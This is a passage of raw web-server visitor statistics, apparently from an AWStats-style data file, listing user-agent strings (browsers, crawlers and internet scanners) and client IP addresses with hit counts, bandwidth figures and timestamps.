+http://archive.org/details/archive.org_bot) Zeno/2865beb warc/v0.8.73 4 5 5 0 59 29171761 0 29228317 28997104 0 28997104 3064 Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 4 0 0 0 1 0 0 28933446 0 0 28933446 0 python-requests/2.22.0 4 1 1 0 0 29366494 0 0 29366494 0 0 1371 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 OPR/121.0.0.0 4 0 0 0 1 0 0 29133704 0 0 29133704 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4 4 11 11 0 0 29371855 0 0 28887713 0 0 14125 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) 4 0 0 0 22 0 0 29373003 0 0 28845585 0 Mozilla/5.0 (l9scan/2.0.5313e2731323e27383e2439313; +https://leakix.net) 4 4 4 0 4 29373021 0 29373029 29111425 0 29111433 5162 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 4 16 2 0 12 29250064 0 29250064 29024120 0 29250064 20079 python-httpx/0.28.1 4 0 0 0 1 0 0 29133701 0 0 29133701 0 Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 5 1 0 0 28845665 0 0 28845665 0 0 4985 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29366930 0 0 29366930 0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 4 5 1 0 0 29176025 0 0 29176024 0 0 4987 Mozilla/5.0 (Linux; Android 10; HUAWEI P30 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 4 1 1 0 0 29118510 0 0 29118510 0 0 612 Mozilla/5.0 (X11; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0 4 0 0 0 2 0 0 29354781 0 0 29354781 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 4 0 0 0 2 0 0 29358846 0 0 29358846 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36 4 1 1 0 0 29302562 0 0 29302562 0 0 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29133699 0 0 29133699 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15 4 0 0 0 1 0 0 29027030 0 0 29027030 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 4 8 8 0 12 29144602 0 29144602 29104700 0 29104700 4920 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 1 1 0 0 29397159 0 0 29397159 0 0 314 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 4 1 0 0 0 29261459 0 0 29261459 0 0 2321 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 4 2 2 0 0 29273719 0 0 29273719 0 0 1263 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 4 0 0 0 8 0 0 29372535 0 0 29372535 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29027228 0 0 29027228 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36 4 0 0 0 1 0 0 29413991 0 0 29413991 0 python-requests/2.32.5 4 3 1 0 0 29342507 0 0 29342507 0 0 3364 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 4 1 0 0 0 29257177 0 0 29257177 0 0 2321 Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57 4 1 0 0 0 29203759 0 0 29203759 0 0 362 Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 4 2 2 0 0 29245958 0 0 29202794 0 0 1224 python-requests/2.32.4 4 7 7 0 0 29120884 0 0 28849501 0 0 4304 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 4 1 1 0 1 29155772 0 29114598 29155772 0 29114598 616 python-requests/2.32.3 4 1 0 0 0 29050910 0 0 29050910 0 0 362 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.57 Whale/3.14.133.23 Safari/537.36 4 2 2 0 0 29407558 0 0 29395825 0 0 628 cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29364336 0 0 29364336 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.8.10 Chrome/132.0.6834.196 Electron/34.2.0 Safari/537.36 4 1 1 0 0 29304741 0 0 29304741 0 0 681 Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 4 6 2 0 0 28845664 0 0 28845658 0 0 5605 Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 4 4 4 0 119 29153338 0 29153338 29126052 0 29126052 5048 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 4 72 72 2 48 29405694 29405694 29405694 28846127 29384652 28846127 43771 Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) 4 1 1 0 0 29372145 0 0 29372145 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 4 2 2 0 0 29352092 0 0 29305288 0 0 1362 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 4 19 17 0 152 29373003 0 29374986 28845585 0 28845585 19790 Go-http-client/1.1 4 0 0 0 4 0 0 29296520 0 0 29226101 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A 4 1 1 0 1 29202794 0 29202794 29202794 0 29202794 612 Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 4 0 0 0 3 0 0 29403917 0 0 29388621 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot 4 0 0 0 1 0 0 29363935 0 0 29363935 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 0 0 0 2 0 0 29155772 0 0 29155772 0 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 4 11 9 0 490 29282790 0 29347753 29114598 0 29116976 8181 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 4 1 1 0 0 28986002 0 0 28986002 0 0 616 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 4 0 0 0 4 0 0 29284082 0 0 29284082 0 Mozila/5.0 4 2 2 0 7 29287157 0 29285569 29285569 0 28847167 610 Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 4 1 1 0 0 29352433 0 0 29352433 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1 4 0 0 0 28 0 0 29181405 0 0 29181339 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 4 0 0 0 6 0 0 29363935 0 0 29357574 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.9.12 Chrome/138.0.7204.235 Electron/37.3.1 Safari/537.36 4 1 1 0 0 29391320 0 0 29391320 0 0 314 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 4 20 4 0 0 29373004 0 0 28933444 0 0 20037 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36 4 0 0 0 5 0 0 29364333 0 0 29364333 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36 4 2 2 0 0 29374761 0 0 29366782 0 0 1362 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29100022 0 0 29100022 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 4 31 31 0 53 29102613 0 29102613 28901235 0 28901235 19052 Mozilla/5.0 (compatible) 4 5 5 0 6 29124770 0 29124770 29110578 0 29110578 3080 Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 4 1 1 0 0 29345761 0 0 29345761 0 0 681 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 4 1 1 0 0 28891469 0 0 28891469 0 0 616 Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 4 15 15 0 3 29382352 0 29348829 29210341 0 29298746 18854 Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity 4 6 6 0 23 29210644 0 29210644 28869173 0 28869173 3680 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 4 1 1 0 1 29023052 0 29023058 29023052 0 29023058 1266 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 4 1 1 0 3 29300946 0 29372913 29300946 0 29372913 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 4 0 0 0 1 0 0 29353668 0 0 29353668 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 4 0 0 0 8 0 0 29109070 0 0 28989890 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 4 4 4 0 4 29386807 0 29386807 29304248 0 29304248 2357 Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0 4 2 2 0 63 29286864 0 29286864 29286864 0 29286864 1220 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_2) Gecko/20090906 Firefox/24.0 4 1 0 0 0 29203763 0 0 29203763 0 0 2321 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 4 6 0 0 0 28886583 0 0 28849501 0 0 8049 python-httpx/0.27.2 4 13 13 0 0 29350469 0 0 29198395 0 0 8226 Mozilla/5.0 zgrab/0.x 4 10 2 0 0 28846656 0 0 28845585 0 0 9974 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36 4 1 1 0 0 29304617 0 0 29304617 0 0 681 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 4 1 1 0 0 29345761 0 0 29345761 0 0 681 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 5 5 0 15 29129658 0 29373309 29110573 0 29146878 3080 Mozilla/5.0 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 4 0 0 0 1 0 0 29361663 0 0 29361663 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 4 0 0 0 5 0 0 29358879 0 0 29354737 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 4 2 2 0 3 29285705 0 29285706 29198396 0 29198396 1222 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0 4 0 0 0 4 0 0 29294501 0 0 29111571 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 4 6 2 0 0 29286419 0 0 29034723 0 0 6144 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 4 0 0 0 1 0 0 29241173 0 0 29241173 0 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 4 26 6 0 0 29391322 0 0 28845586 0 0 25255 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 4 1 1 0 0 29097975 0 0 29097975 0 0 616 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 4 0 0 0 10 0 0 29266066 0 0 29131679 0 Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection) 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0 4 1 1 0 0 29198396 0 0 29198396 0 0 612 Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 THDConsumer/7.45.0.1 (iPhone;iOS 18.3.1)DID: 4 7 7 0 0 29373003 0 0 28845585 0 0 8960 Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3 4 0 0 0 1 0 0 29027032 0 0 29027032 0 Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25 4 1 0 0 0 29203761 0 0 29203761 0 0 362 Mozilla/5.0 (Linux; Android 6.0; Lenovo A7000-a Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36 4 4 4 0 0 29210643 0 0 28869173 0 0 5056 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 4 4 4 0 1 29305074 0 29305074 29305074 0 29305074 5484 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 2 2 0 0 29352199 0 0 29159531 0 0 1297 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 4 1 1 0 0 29303697 0 0 29303697 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 1 1 0 0 29021325 0 0 29021325 0 0 616 python-requests/2.31.0 4 1 1 0 0 29328596 0 0 29328596 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4093.0 Safari/537.36 Edg/83.0.470.0 4 20 5 0 10 29355503 0 29355503 29353290 0 29353290 21550 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 5 0 0 29351887 0 0 29230611 0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot) 4 1 1 0 5 29265800 0 29265800 29265800 0 29265800 1263 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 18 6 0 18 29329343 0 29329343 29110429 0 29110429 18560 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36 4 1 1 0 0 29302562 0 0 29302562 0 0 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0 4 0 0 0 2 0 0 29369021 0 0 29358875 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; robots.txt; +https://openai.com/searchbot 4 1 1 0 0 29285705 0 0 29285705 0 0 610 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/114.0.5775.194 Chrome/114.0.5775.194 Safari/537.36 4 0 0 0 3 0 0 29363635 0 0 29363635 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28896692 0 0 28896692 0 Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 4 1 1 0 0 29303697 0 0 29303697 0 0 681 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 4 1 1 0 1 29373247 0 29373247 29373247 0 29373247 681 Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) 4 0 0 0 1 0 0 29116640 0 0 29116640 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 4 1 0 0 0 29118511 0 0 29118511 0 0 362 Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 1 1 0 0 29285705 0 0 29285705 0 0 610 Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5810.222 Chrome/115.0.5810.222 Safari/537.36 4 1 0 0 0 28854038 0 0 28854038 0 0 2321 AndroidDownloadManager/5.1 (Linux; U; Android 5.1; Z820 Build/LMY47D) 4 1 1 0 0 29373380 0 0 29373380 0 0 1371 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 6 6 0 0 29356989 0 0 29241639 0 0 3875 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 4 18 18 0 18 29406443 0 29406443 29264008 0 29264008 10660 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 20 4 0 1 29176024 0 29176024 29176024 0 29176024 19944 Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36 4 16 0 0 0 29373002 0 0 28845583 0 0 1024 Cpanel-HTTP-Client/1.0 4 1 1 0 0 29046038 0 0 29046038 0 0 616 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68 5 0 0 0 1 0 0 29172778 0 0 29172778 0 203.89.120.4 5 0 0 0 1 0 0 29190672 0 0 29190672 0 1.204.100.128 5 1 0 0 0 29285163 0 0 29285163 0 0 87 35.86.121.150 5 3 3 0 3 29285163 0 29285163 28933444 0 28933444 1842 51.89.167.1 5 0 0 0 1 0 0 29310772 0 0 29310772 0 195.178.110.155 5 1 1 0 1 29378326 0 29378326 29378326 0 29378326 681 167.71.43.139 5 3 1 0 3 29034723 0 29305888 29033429 0 29305880 3075 45.148.10.140 5 0 0 0 3 0 0 29368457 0 0 29368457 0 91.245.146.210 5 1 1 0 0 28993148 0 0 28993148 0 0 616 87.236.176.30 5 1 1 0 0 29106310 0 0 29106310 0 0 1266 54.78.37.48 5 1 1 0 2 28942130 0 28942130 28942130 0 28942130 612 164.92.64.51 5 0 0 0 1 0 0 29286135 0 0 29286135 0 91.196.152.53 5 0 0 0 1 0 0 29111433 0 0 29111433 0 91.196.152.51 5 3 1 0 0 29311193 0 0 29311193 0 0 9759 195.178.110.130 5 1 1 0 0 29220105 0 0 29220105 0 0 612 34.74.89.8 5 1 1 0 1 29304992 0 29304992 29304992 0 29304992 681 104.131.57.29 5 1 1 0 2 28961691 0 28961691 28961691 0 28961691 612 165.232.113.100 5 0 0 0 1 0 0 29190672 0 0 29190672 0 120.85.113.237 5 1 1 0 1 29024010 0 29024010 29024010 0 29024010 616 192.241.159.241 5 2 2 0 5 28869730 0 28869730 28869730 0 28869730 1882 152.32.138.187 5 1 1 0 1 29117762 0 29117762 29117762 0 29117762 612 178.128.29.45 5 1 1 0 3 29171385 0 29171385 29171385 0 29171385 612 47.237.149.97 5 3 3 0 18 29024062 0 29024062 29024062 0 29024062 3786 3.80.124.67 5 0 0 0 155 0 0 29386605 0 0 29386605 0 20.196.107.56 5 1 1 0 0 29356114 0 0 29356114 0 0 681 44.199.250.218 5 1 1 0 1 28864731 0 28864731 28864731 0 28864731 616 64.225.76.151 5 0 0 0 3 0 0 29370206 0 0 29370173 0 2.57.122.102 5 1 1 0 1 29285919 0 29285919 29285919 0 29285919 610 188.166.97.175 5 0 0 0 1 0 0 29360577 0 0 29360577 0 95.105.74.244 5 1 1 0 0 29372145 0 0 29372145 0 0 681 183.207.45.117 5 1 1 0 0 29216130 0 0 29216130 0 0 612 3.17.255.71 5 1 1 0 0 29186955 0 0 29186955 0 0 1262 196.251.72.212 5 1 1 0 1 29248628 0 29248628 29248628 0 29248628 612 34.87.8.121 5 0 0 0 2 0 0 29354737 0 0 29354737 0 146.120.201.62 5 1 1 0 0 29244752 0 0 29244752 0 0 1262 79.125.49.29 5 1 1 0 1 28868684 0 28868684 28868684 0 28868684 616 138.197.135.55 5 1 1 0 0 29249045 0 0 29249045 0 0 612 35.238.110.97 5 0 0 0 138 0 0 29370907 0 0 29370906 0 20.39.203.102 5 10 2 0 0 28845700 0 0 28845700 0 0 9970 35.92.223.216 5 1 1 0 0 28986002 0 0 28986002 0 0 616 110.172.98.2 5 0 0 0 2 0 0 28989890 0 0 28989890 0 35.181.58.195 5 0 0 0 42 0 0 29309619 0 0 29309619 0 104.41.205.21 5 4 4 0 0 28845658 0 0 28845658 0 0 2456 54.184.218.25 5 1 1 0 0 29373380 0 0 29373380 0 0 1371 89.188.125.254 5 1 1 0 2 28983342 0 28983342 28983342 0 28983342 616 138.197.113.236 5 0 0 0 1 0 0 29360582 0 0 29360582 0 95.55.186.82 5 1 0 0 0 29109308 0 0 29109308 0 0 87 3.129.253.254 5 1 1 0 0 29152582 0 0 29152582 0 0 616 45.148.96.51 5 2 0 0 1 29176024 0 29176024 29176024 0 29176024 2727 123.6.49.50 5 0 0 0 1 0 0 29176025 0 0 29176025 0 123.6.49.47 5 6 1 0 1 29176025 0 29176025 29176024 0 29176025 5347 123.6.49.44 5 0 0 0 184 0 0 29278687 0 0 29277822 0 85.239.243.62 5 1 1 0 1 29346554 0 29346554 29346554 0 29346554 681 206.189.55.192 5 2 2 0 0 29327648 0 0 29253526 0 0 1291 18.224.192.118 5 1 1 0 1 29284342 0 29284342 29284342 0 29284342 610 174.138.9.49 5 1 1 0 0 29382358 0 0 29382358 0 0 314 104.28.40.2 5 2 1 0 0 29176024 0 0 29176024 0 0 1898 123.6.49.18 5 1 1 0 1 29114598 0 29114598 29114598 0 29114598 616 45.88.186.135 5 1 1 0 2 29104700 0 29104700 29104700 0 29104700 616 143.110.249.133 5 1 1 0 1 28922603 0 28922603 28922603 0 28922603 616 167.94.138.195 5 7 7 0 5 29356123 0 29356125 29085243 0 29085243 4637 167.94.138.193 5 1 1 0 0 29154246 0 0 29154246 0 0 616 23.239.27.53 5 1 1 0 0 28898938 0 0 28898938 0 0 616 87.236.176.252 5 1 1 0 0 29323749 0 0 29323749 0 0 681 2.58.56.223 5 2 2 0 1 29229974 0 29229974 29229974 0 29229974 1224 167.94.138.188 5 1 0 0 0 28933443 0 0 28933443 0 0 87 18.141.208.14 5 0 0 0 1 0 0 29403917 0 0 29403917 0 74.7.228.16 5 0 0 0 1 0 0 29248444 0 0 29248444 0 2.58.56.215 5 1 1 0 1 29288955 0 29288955 29288955 0 29288955 610 206.81.21.139 5 0 0 0 8 0 0 29284082 0 0 29284082 0 194.233.80.217 5 0 0 0 152 0 0 29416384 0 0 29416384 0 4.218.20.75 5 0 0 0 1 0 0 29198403 0 0 29198403 0 217.138.255.189 5 2 2 0 5 28869173 0 28869173 28869173 0 28869173 1882 107.150.101.57 5 1 1 0 0 28846724 0 0 28846724 0 0 616 87.236.176.237 5 4 1 0 2 29353542 0 29353542 29353542 0 29353542 4310 34.1.21.180 5 0 0 0 8 0 0 29372535 0 0 29372535 0 77.232.161.150 5 1 1 0 1 29110578 0 29110578 29110578 0 29110578 616 159.203.47.220 5 2 2 0 2 28863291 0 28863291 28861851 0 28861851 1232 157.245.70.112 5 1 1 0 0 29202794 0 0 29202794 0 0 612 34.22.221.223 5 0 0 0 2 0 0 29266066 0 0 29266066 0 35.240.227.84 5 1 1 0 0 29351081 0 0 29351081 0 0 681 34.78.114.98 5 1 1 0 0 29097975 0 0 29097975 0 0 616 46.245.76.50 5 2 2 0 1 29187793 0 29187792 29187792 0 29187792 1224 167.94.138.160 5 1 1 0 0 29014350 0 0 29014350 0 0 1266 34.247.251.70 5 0 0 0 1 0 0 29274167 0 0 29274167 0 13.231.81.204 5 0 0 0 28 0 0 29181405 0 0 29181339 0 101.55.81.36 5 1 1 0 0 29276689 0 0 29276689 0 0 610 18.232.146.67 5 1 1 0 0 29300375 0 0 29300375 0 0 681 87.236.176.205 5 1 0 0 0 29285163 0 0 29285163 0 0 87 13.49.78.41 5 1 1 0 0 29305074 0 0 29305074 0 0 1371 64.15.129.126 5 1 1 0 0 29097800 0 0 29097800 0 0 616 87.236.176.191 5 0 0 0 105 0 0 29368527 0 0 29368526 0 172.192.64.10 5 1 